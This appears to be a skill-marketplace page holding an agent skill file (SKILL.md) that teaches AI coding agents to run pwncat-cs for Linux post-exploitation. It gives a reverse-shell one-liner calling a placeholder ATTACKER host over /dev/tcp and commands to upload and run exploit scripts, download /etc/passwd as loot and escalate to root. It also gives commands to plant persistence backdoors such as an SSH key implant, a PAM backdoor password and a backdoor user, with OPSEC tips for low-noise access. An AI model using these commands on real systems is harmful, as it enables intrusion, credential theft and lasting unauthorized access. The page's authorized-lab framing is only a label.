aeondave/pwncat
offensive-tools/linux/pwncat/SKILL.md
Auth/lab ref: pwncat-cs Linux session management; listener/connect modes, shell stabilization, module enum, tunnel and cleanup workflow.
$ install --global
skillsauthnpx skillsauth add aeondave/malskill pwncatInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Jun 8, 2026, 3:52 AM113.7s4 files scanned
SKILL.md
- name:
- pwncat
- description:
- Auth/lab ref: pwncat-cs Linux session management; listener/connect modes, shell stabilization, module enum, tunnel and cleanup workflow.
- license:
- MIT
- compatibility:
- Target: primarily Linux (Windows support exists but this skill is Linux-focused).
- author:
- AeonDave
- version:
- 1.0
pwncat
pwncat-cs is a shell handler + post-exploitation framework. It wraps unstable shells, exposes module-based automation (search / use / run), and manages persistence implants with reconnect support.
Quick Start
# Start listener for reverse shell
pwncat-cs -lp 4444
# Target callback example
bash -i >& /dev/tcp/ATTACKER/4444 0>&1
# SSH channel (stable and preferred when creds exist)
pwncat-cs [email protected]
# Bind shell connect
pwncat-cs connect://10.10.10.10:4444
Core Concepts
- Local mode: pwncat commands (
search,use,run,upload,download,escalate) - Remote mode: target shell commands (
id,uname -a,cat /etc/passwd) - Toggle modes with
Ctrl-D.
Essential Commands
| Command | Description |
|---|---|
| search <glob> | Find modules (ex: search enumerate.*) |
| use <module> | Enter module context |
| info | Show selected module arguments/help |
| set <arg> <value> | Set module argument in context |
| run <module> [k=v...] | Execute module directly |
| escalate list [-u user] | List available escalation paths |
| escalate run [-u user] | Execute escalation (direct + recursive chaining) |
| run implant ... | List/escalate/remove installed implants |
| upload <local> <remote> | Upload file to target |
| download <remote> <local> | Download file from target |
| back | Leave module context |
| exit | Exit pwncat |
Module Workflow (Recommended)
Use the module workflow instead of ad-hoc commands:
(local) pwncat$ search enumerate.*
(local) pwncat$ use enumerate.gather
(enumerate.gather) local$ info
(enumerate.gather) local$ set types file.suid
(enumerate.gather) local$ run
Equivalent one-liner:
(local) pwncat$ run enumerate.gather types=file.suid
Upload & Execution Workflow
# Upload local file to target
(local) pwncat$ upload /opt/tools/exploit.sh /tmp/exploit.sh
# Execute on target (remote mode command)
(remote) target$ chmod +x /tmp/exploit.sh
(remote) target$ /tmp/exploit.sh
# Download loot
(local) pwncat$ download /etc/passwd ./loot/passwd.target
Privilege Escalation Workflow
# Enumerate escalation options
(local) pwncat$ escalate list
(local) pwncat$ escalate list -u root
# Execute escalation
(local) pwncat$ escalate run
(local) pwncat$ escalate run -u root
Notes:
escalate runtries direct paths first, then recursive chains if needed.- Validate after escalation (
id,whoami, access checks).
Persistence Implants Workflow
pwncat has first-class implant modules for install/list/escalate/remove.
# install key implant (preferred)
(local) pwncat$ run implant.authorized_key key=./id_rsa.pub
# install as specific user (requires required privileges)
(local) pwncat$ run implant.authorized_key user=john key=./id_rsa.pub
# optional high-noise / higher-risk implants
(local) pwncat$ run implant.pam password='TempBackdoor!'
(local) pwncat$ run implant.passwd backdoor_user=svc-backup backdoor_pass='TempBackdoor!'
# list implants
(local) pwncat$ run implant
(local) pwncat$ run implant list
# escalate via local implant
(local) pwncat$ run implant escalate
# remove implants at end of operation
(local) pwncat$ run implant remove
Reconnect Workflow
If implants were installed, reconnecting is built-in:
# List known implant-enabled hosts
pwncat-cs --list
# Reconnect by host-id (best when NAT/shared IP)
pwncat-cs <host-id>
# Reconnect by user@host (tries known implants then ssh fallback)
pwncat-cs [email protected]
Connection Modes (CLI)
# catch raw reverse shell
pwncat-cs -lp 4444
# connect to bind shell
pwncat-cs connect://10.10.10.10:4444
# ssh channel
pwncat-cs ssh://user:[email protected]
pwncat-cs -i ./id_rsa [email protected]
# encrypted listener (auto self-signed cert)
pwncat-cs --ssl -lp 4444
# windows platform example (out of scope for this skill)
pwncat-cs -m windows -lp 4444
OPSEC Guidance
- Prefer explicit protocol URIs (
bind://,connect://,ssh://) in scripts. - Prefer
implant.authorized_keyover password implants when feasible. - Use encrypted channels (
--ssl) when traffic inspection risk is high. - Remove implants when engagement phase ends (
run implant remove). - Avoid assuming module names; discover with
searchfirst.
Integration with Other Skills
| Skill | Why combine |
|---|---|
| linpeas | Deep Linux enumeration outside pwncat modules |
| linux-persistence | Persistence tradeoffs and hardening-aware patterns |
| ssh-key-scanner | Key discovery and lateral movement planning |
Known Pitfalls
- Confusing
pwncatvspwncat-csbinary names. - Relying on implicit protocol parsing in automation.
- Treating ad-hoc shell commands as module execution.
- Installing implants and forgetting removal/verification.
Resources
| File | When to load |
|---|---|
| references/module-workflow-cheatsheet.md | When you need exact search/use/set/run and escalate usage patterns |
| references/connection-modes-and-opsec.md | When selecting bind/connect/ssh/ssl mode and planning low-noise access |
| references/post-exploitation-playbook.md | For end-to-end Linux flow: access → enum → escalate → persist → reconnect → cleanup |
Related Skills
aeondave/vibe-audit-technique
development
VerifiedTrustedCommunity
White-box auditing methodology for AI-generated ('vibe-coded') applications. Focuses on modern stack misconfigurations (Supabase, Next.js, Vercel).
4SKILL.mdUpdated Jun 12, 2026
aeondave/source-review-technique
development
VerifiedTrustedCommunity
Hybrid AI/Deterministic SAST methodology for discovering zero-day vulnerabilities in source code. Orchestrates structural search with AI-driven data flow and sink validation.
4SKILL.mdUpdated Jun 12, 2026
aeondave/hardware-technique
development
VerifiedTrustedCommunity
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.
4SKILL.mdUpdated Jun 12, 2026
aeondave/container-technique
devops
VerifiedTrustedCommunity
Container methodology: Identifying containerization limits, Docker/K8s misconfigurations, and executing escapes to the host node.
4SKILL.mdUpdated Jun 12, 2026